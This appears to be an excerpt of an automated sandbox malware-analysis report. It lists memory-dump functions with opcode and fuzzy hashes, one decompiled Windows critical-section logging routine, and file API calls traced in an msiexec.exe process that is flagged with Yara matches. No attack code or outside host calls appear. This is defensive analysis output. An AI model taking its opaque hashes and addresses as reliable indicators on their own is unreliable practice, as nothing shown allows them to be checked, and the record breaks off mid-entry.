
API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 845f27e0d3035fe4a9aafbaa3c659437c421b0116b6918366564f14067805131
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 00C08C30280A02ABFB221F24CD01B003BA0BB90B41F4400A06301DE0F0DB78D802EA00

Uniqueness

Uniqueness Score: -1.00%

Function 0159A537, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 747da4b49a82e5c8840172c436806c5380fdb97b3ffdb6f5edddfdb2d908377c
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 09C01232080248BBCB126E82CC00F067B2AFBA4B60F008010BA080F5608632E970EA94

Uniqueness

Uniqueness Score: -1.00%

Function 01533A1C, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: dc9369e9696a016dce692d097bb8ebee948c17c9d2e54ffd41c5d4fbb958bdf4
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 77C04C32180649BBC7126E45DD01F157B69E7E4B60F154021B6040B5618576ED61E598

Uniqueness

Uniqueness Score: -1.00%

Function 0151AD30, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 1a35296fea2f7b4ce8a6a72ccd4df8f4614b1d313c43e1cb4b300e2a3fa71e9d
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: F3C08C32080248BBC7126A45CD00F017B29E7E4B60F000020B6040B6618932E861D598

Uniqueness

Uniqueness Score: -1.00%

Function 015436CC, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 74c75a22f4fb847a9b85181c2791052a19c4e868cc1cdd831b929382a46fc0b9
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: AFC02B70150841FBE7151F30CD01F187354F780A21F64035472204E4F0D5389C00E100

Uniqueness

Uniqueness Score: -1.00%

Function 015276E2, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: eb2c6e63696ff5054176a3416f34a1bd86eef8ae19dd975fbe0aa64c25445722
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: ABC08CB21411855AEB3B970DCE20B283A50BB6D648F48019CEA220E4E2C368B803C208

Uniqueness

Uniqueness Score: -1.00%

Function 01537D50, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 25e6e7f362d6367f6fe6ce02b484780cfb33aba38a1c1c8ea065e03ad6abd255
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: B9B092353019408FCE16DF18C084B1933E4BB88A40B8404D0E400CBA21D329E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 01542ACB, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 993ca64c6aadb86c0ad6e72b6b90007f4e7039cabf9083ae6c15323bdcc8d167
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 5BB01233C10452CFCF02EF40C610B197331FB40750F054490D0012B970C228AC01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 01559950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1caae452a7cb83e1e991ba969e31b3730de14db6cf0dfac043b6827e24592d40
Instruction ID: 3ac37b5c1bdd7bae7a10f0e55d6735c415655284b503ce92a92ca0a1fc6a2c82
Opcode Fuzzy Hash: 1caae452a7cb83e1e991ba969e31b3730de14db6cf0dfac043b6827e24592d40
Instruction Fuzzy Hash: 2B9002A134140803E140659A88046070059B7D0342F51C811A2454A55ECE698C51B1B5

Uniqueness

Uniqueness Score: -1.00%

Function 015599D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5a542b3247b91398f05bd5c06441455641207b21b715ed177014b119b1484b4
Instruction ID: 963247d3234332fd4351b6f8caa592097f019a24edb0cc612d5bd2658eacc4d5
Opcode Fuzzy Hash: a5a542b3247b91398f05bd5c06441455641207b21b715ed177014b119b1484b4
Instruction Fuzzy Hash: E99002A135100442E104619A84047060099B7E1241F51C812A2544A54CC9698C61A1A5

Uniqueness

Uniqueness Score: -1.00%

Function 0155B040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 872e3610eca5e7c891347bcf6462fad89f56e081a47d96b0a2f0579ea51bc05b
Instruction ID: 4bf695e71e1b88043ce09c34269a7348212455f2a16e47a674dd416596d43dd0
Opcode Fuzzy Hash: 872e3610eca5e7c891347bcf6462fad89f56e081a47d96b0a2f0579ea51bc05b
Instruction Fuzzy Hash: 8F9002A1741144435540B19A88044065069B7E1341391C921A0844A60CCAA88855E2E5

Uniqueness

Uniqueness Score: -1.00%

Function 01559820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5a293a93c8ca725caa0c422fb3039275b3addc8c926e1ddb01c61d80735ab17
Instruction ID: f8d3da15e2f5902dbafa85c2ad87e33a11e75ee97c860db9d52c56b1401c267d
Opcode Fuzzy Hash: b5a293a93c8ca725caa0c422fb3039275b3addc8c926e1ddb01c61d80735ab17
Instruction Fuzzy Hash: A190027138100802E141719A8404606005DB7D0281F91C812A0814A54ECA958A56FAE1

Uniqueness

Uniqueness Score: -1.00%

Function 015598A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ad49a9d192bc79d40a651df08ade9ddf5841e1d48eef541c14e85e34e0194fb
Instruction ID: b467b0260e2db777dc9e365778423521a3eead83a3e6faf373613de84c0ffca7
Opcode Fuzzy Hash: 1ad49a9d192bc79d40a651df08ade9ddf5841e1d48eef541c14e85e34e0194fb
Instruction Fuzzy Hash: DD90026134100802E102619A8414606005DF7D1385F91C812E1814A55DCA658953F1B2

Uniqueness

Uniqueness Score: -1.00%

Function 01559B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5fdcaf7bf06f76a6701a7035a03427122aa7bdab2c3ddc6e9dce785358387b3
Instruction ID: c1af000c7492cf17888a127abaa5e7e569c6bec89a3fd0d332a69a9dc3411c52
Opcode Fuzzy Hash: c5fdcaf7bf06f76a6701a7035a03427122aa7bdab2c3ddc6e9dce785358387b3
Instruction Fuzzy Hash: 7190026138100C02E140719AC414707005AF7D0641F51C811A0414A54DCA568965B6F1

Uniqueness

Uniqueness Score: -1.00%

Function 0155A3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2c2a80d606eab1b7da8e4cb6065bdea1c12508d3d714f3eb3289fcfcfbe5c9f
Instruction ID: 46c0012223a1e7887490fec27923352c36fde487a503d7638ec59ba6397913ce
Opcode Fuzzy Hash: c2c2a80d606eab1b7da8e4cb6065bdea1c12508d3d714f3eb3289fcfcfbe5c9f
Instruction Fuzzy Hash: 3A90027134144402E140719AC44460B5059B7E0341F51CC11E0815A54CCA558856E2A1

Uniqueness

Uniqueness Score: -1.00%

Function 01559A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cd1d4e2557870f8a497c2240fbb24ff3148de9cedc7bf02a77d52017cb47f04
Instruction ID: 52143f854a47f1cfd3b61737860caf8cc78b3873c1e69d7cbefc875c0ee081ec
Opcode Fuzzy Hash: 1cd1d4e2557870f8a497c2240fbb24ff3148de9cedc7bf02a77d52017cb47f04
Instruction Fuzzy Hash: 4390027134140802E100619A88087470059B7D0342F51C811A5554A55ECAA5C891B5B1

Uniqueness

Uniqueness Score: -1.00%

Function 01559A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c036dfe0abefff3ebc9b9fc17f6c87c292008e21def0e030884d1c00156eeb6
Instruction ID: b4288c240d38048433b100680f37440f83749033f2e0bc6bdd4672583b5b0c5d
Opcode Fuzzy Hash: 4c036dfe0abefff3ebc9b9fc17f6c87c292008e21def0e030884d1c00156eeb6
Instruction Fuzzy Hash: 4490026134144842E140629A8804B0F4159B7E1242F91C819A4546A54CCD558855A7A1

Uniqueness

Uniqueness Score: -1.00%

Function 01559560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df9e7c8c8438ba994f5d8b4caeaa55fe3fcda3a31a34f454937b6e6ee62d6ed4
Instruction ID: fe40441700d698ad98891482e28a633563f847b6a05c6680477744bacba8889d
Opcode Fuzzy Hash: df9e7c8c8438ba994f5d8b4caeaa55fe3fcda3a31a34f454937b6e6ee62d6ed4
Instruction Fuzzy Hash: 1E900265361004021145A59A460450B0499B7D6391391C815F1806A90CCA618865A3A1

Uniqueness

Uniqueness Score: -1.00%

Function 0155AD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7b47ed8bcf8f7b75e8c7a9ee55954aa8e035112325cba06c9b0302c19167626
Instruction ID: ee6cc36bcc80b87b1d972d9f2995cebdf4aab612332ea5a69e61cb39513fd6c2
Opcode Fuzzy Hash: a7b47ed8bcf8f7b75e8c7a9ee55954aa8e035112325cba06c9b0302c19167626
Instruction Fuzzy Hash: 11900271B4500412A140719A8814646405AB7E0781B55C811A0904A54CCD948A55A3E1

Uniqueness

Uniqueness Score: -1.00%

Function 01559520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b25522418fc53767582d9b39bdd9926c26a80310306102199c18cba163075cb
Instruction ID: ea335cf5564b35d5cdcf9ce8e2c1eadb02cbb052c2f2278f85d1b1173219adea
Opcode Fuzzy Hash: 1b25522418fc53767582d9b39bdd9926c26a80310306102199c18cba163075cb
Instruction Fuzzy Hash: 1F9002E1341144925500A29AC404B0A4559B7E0241B51C816E1444A60CC9658851E1B5

Uniqueness

Uniqueness Score: -1.00%

Function 015595F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d8f4b31452fcd8998e1589baad99da018b3e6ddb83dcd7d7e2ff28b3c53adbb
Instruction ID: 10cc6543d14bb558412f18b9f00644fb7aef4ebec6039b0c88b223be13f74210
Opcode Fuzzy Hash: 7d8f4b31452fcd8998e1589baad99da018b3e6ddb83dcd7d7e2ff28b3c53adbb
Instruction Fuzzy Hash: 5E90027134100C02E104619A88046860059B7D0341F51C811A6414B55EDAA58891B1B1

Uniqueness

Uniqueness Score: -1.00%

Function 0155A770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 756ce866f34691ec31e677b203372eb0653bb0bce5022aeeebcebd5bb3d36088
Instruction ID: 5c25f61c31467142787bb54da8c17c0c533ecce09494cc4afa8368fb744201e1
Opcode Fuzzy Hash: 756ce866f34691ec31e677b203372eb0653bb0bce5022aeeebcebd5bb3d36088
Instruction Fuzzy Hash: 4D90027534504842E500659A9804A870059B7D0345F51DC11A0814A9CDCA948861F1A1

Uniqueness

Uniqueness Score: -1.00%

Function 01559770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11edda03b8f2ecbf3935ff873f63d20b5bbfeafda1f5b07c606c00dd1ae8283c
Instruction ID: 938c4dd4fce7914d3dc81b5887f9144a664b916aa862e2bd17172e72af387ff5
Opcode Fuzzy Hash: 11edda03b8f2ecbf3935ff873f63d20b5bbfeafda1f5b07c606c00dd1ae8283c
Instruction Fuzzy Hash: 2990026134504842E100659A9408A060059B7D0245F51D811A1454A95DCA758851F1B1

Uniqueness

Uniqueness Score: -1.00%

Function 01559760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702299ad3735796deff154d55b530e84f1c9dfc44343a8fa0b307a98bcadaacd
Instruction ID: bf38c0d2533984b8b22a138daa04718502ef791f36bf6479ed33f4f47e029211
Opcode Fuzzy Hash: 702299ad3735796deff154d55b530e84f1c9dfc44343a8fa0b307a98bcadaacd
Instruction Fuzzy Hash: 3890027134100803E100619A95087070059B7D0241F51DC11A0814A58DDA968851B1A1

Uniqueness

Uniqueness Score: -1.00%

Function 0155A710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f497968cb3c51fa0374d960079668a20ff3193a3a4d82dce1839003fe02dafa2
Instruction ID: efcab0d61c585fb47f5510620fe433d4bfe20e8dcf2673fb1bd89a1ffe0faa56
Opcode Fuzzy Hash: f497968cb3c51fa0374d960079668a20ff3193a3a4d82dce1839003fe02dafa2
Instruction Fuzzy Hash: 7190027134100452A500A6DA9804A4A4159B7F0341B51D815A4404A54CC9948861A1A1

Uniqueness

Uniqueness Score: -1.00%

Function 01559730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be12e1873fd36346bef06b933ecaba91ae826b207fda3e8a53000b0e418d3672
Instruction ID: a5084e88f56899fbcff899ce2970deae424ee27eebd642541cda45943aa5e365
Opcode Fuzzy Hash: be12e1873fd36346bef06b933ecaba91ae826b207fda3e8a53000b0e418d3672
Instruction Fuzzy Hash: BE90026174500802E140719A94187060069B7D0241F51D811A0414A54DCA998A55B6E1

Uniqueness

Uniqueness Score: -1.00%

Function 01559FE0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84e467dcff67bf5cea4cba6ec3f49a42fa75ed1ac1cdb32d42651bd5b4c65846
Instruction ID: 5e0f5fbe59d02f9195e52f7c2be94fe2e294676d3397dcb987eb5eb04d62fef4
Opcode Fuzzy Hash: 84e467dcff67bf5cea4cba6ec3f49a42fa75ed1ac1cdb32d42651bd5b4c65846
Instruction Fuzzy Hash: 5690027135114802E110619AC4047060059B7D1241F51CC11A0C14A58DCAD58891B1A2

Uniqueness

Uniqueness Score: -1.00%

Function 01559650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f53d5cc2ac528de9038f8d5aa146f3ee2acd10c5e42e471c2475616be130827
Instruction ID: 852b7cd19d64156495cf8eeb55c10c472e1ee90a9b36a7f6ceb5098a7ac50f9d
Opcode Fuzzy Hash: 3f53d5cc2ac528de9038f8d5aa146f3ee2acd10c5e42e471c2475616be130827
Instruction Fuzzy Hash: 2490027134504C42E140719A8404A460069B7D0345F51C811A0454B94DDA658D55F6E1

Uniqueness

Uniqueness Score: -1.00%

Function 01559610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0be9e9dc34b1ceb47325e33eaae8e3ca6aabf7c524778cea2b4f7de4d7719f3
Instruction ID: d207fd00c2bb29431aa3e7929745df9d86989b9ec1240332e484f1fdb352853a
Opcode Fuzzy Hash: c0be9e9dc34b1ceb47325e33eaae8e3ca6aabf7c524778cea2b4f7de4d7719f3
Instruction Fuzzy Hash: 3190027174500C02E150719A84147460059B7D0341F51C811A0414B54DCB958A55B6E1

Uniqueness

Uniqueness Score: -1.00%

Function 015596D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c056a86414ce3fec9f3a7b16900f9b97cfbfb8d1a726feaa653c9ae079085527
Instruction ID: 655c62273e6807598454c43cbc46cff6b3a2d6656a86954138559e0bd0cee704
Opcode Fuzzy Hash: c056a86414ce3fec9f3a7b16900f9b97cfbfb8d1a726feaa653c9ae079085527
Instruction Fuzzy Hash: EF90027134100C42E100619A8404B460059B7E0341F51C816A0514B54DCA55C851B5A1

Uniqueness

Uniqueness Score: -1.00%

Function 01559670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 20c378c9b74efde3e0c4080de1f1c91faa7b86f549874143dae7690fd398e750
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 015AFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E015AFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0155CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E015A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E015A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x015afdda
0x015afde2
0x015afde5
0x015afdec
0x015afdfa
0x015afdff
0x015afe0a
0x015afe0f
0x015afe17
0x015afe1e
0x015afe19
0x015afe19
0x015afe19
0x015afe20
0x015afe21
0x015afe22
0x015afe25
0x015afe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015AFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015AFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015AFE01

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: c7ff2bec60d01c17bd92fe8d816fad9da5fe61fe8d0088bacb09de3607bbbb6a
Instruction ID: 24f620ffca7a126d8abe78fd34cc2b749bdcdda76617122e13be6d1849427c08
Opcode Fuzzy Hash: c7ff2bec60d01c17bd92fe8d816fad9da5fe61fe8d0088bacb09de3607bbbb6a
Instruction Fuzzy Hash: 31F0C8321406027FD6211A85DC05F2BBF5AFB84770F540215F6185D1D1E962B82096A4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: msiexec.exe PID: 6748 Parent PID: 3388 msiexec.exeCOMMON

Executed Functions

Function 00699F40, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00694B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00694B87,007A002E,00000000,00000060,00000000,00000000), ref: 00699F8D

Strings

.z`, xrefs: 00699F7D, 00699F88

Memory Dump Source

Source File: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 1a3357f9aa9d09817f594c07f797fede5d82506d2773d7d6b899ff0a83921786
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 4FF0B2B2200208ABCB48CF88DC95EEB77EDAF8C754F158248BA0D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00699F3A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00694B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00694B87,007A002E,00000000,00000060,00000000,00000000), ref: 00699F8D

Strings

.z`, xrefs: 00699F7D, 00699F88

Memory Dump Source

Source File: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: b1c6953e65a4ce44b83c36ba1968647d0f58898e16318e103268ebbec43ca6f0
Instruction ID: fe7011ca10d04864499dc925b4e499d08a483445aae400179ed1ce4325a32e30
Opcode Fuzzy Hash: b1c6953e65a4ce44b83c36ba1968647d0f58898e16318e103268ebbec43ca6f0
Instruction Fuzzy Hash: 10F019B2210149ABCB08DF98D884CEB77ADBF8C354B05824CFA1DA7201D630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0069A070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL( Mi,?,?,00694D20,00000000,FFFFFFFF), ref: 0069A095

Strings

Mi, xrefs: 0069A08C, 0069A094

Memory Dump Source

Source File: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: Mi
API String ID: 3535843008-3065345862
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 6f601d4212a7e707741e18de7c15c92e0c9fb2901dd87bb4f4f9a44434c491e6
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: BBD01776200214ABDB10EBD8CC85FA7BBADEF48760F154499BA189B242C530FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 0069A072, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL( Mi,?,?,00694D20,00000000,FFFFFFFF), ref: 0069A095

Strings

Mi, xrefs: 0069A08C, 0069A094

Memory Dump Source

Source File: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: Mi
API String ID: 3535843008-3065345862
Opcode ID: 02f09d60961d913d46fe804f44ce9272827ead6f5594cb76db36b0cccc53dc0a
Instruction ID: 4250c0768d3fd6e72e1cba0af4c2092a01d43fc16e9ea49c5e804d2e10617c19
Opcode Fuzzy Hash: 02f09d60961d913d46fe804f44ce9272827ead6f5594cb76db36b0cccc53dc0a
Instruction Fuzzy Hash: E9D01776200210ABDB10EBA8CC85FE77BA9EF48360F154599BA1C9B242C530E60086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00699FEA, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,00694A01,?,?,?,?,00694A01,FFFFFFFF,?,BMi,?,00000000), ref: 0069A035

Memory Dump Source

Source File: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 8bac69b0551092d025c5484efbba4f17cd280d8b39746623bcdfd2c10be3b124
Instruction ID: a046fb2c98a444b76f26592550954273eec4bb47bfae135c1754a96a25a58703
Opcode Fuzzy Hash: 8bac69b0551092d025c5484efbba4f17cd280d8b39746623bcdfd2c10be3b124
Instruction Fuzzy Hash: 92F0F9B2200108ABCB04DF88CC91EEB77ADEF8C714F158248BE1D97241D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00699FF0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,00694A01,?,?,?,?,00694A01,FFFFFFFF,?,BMi,?,00000000), ref: 0069A035

Memory Dump Source

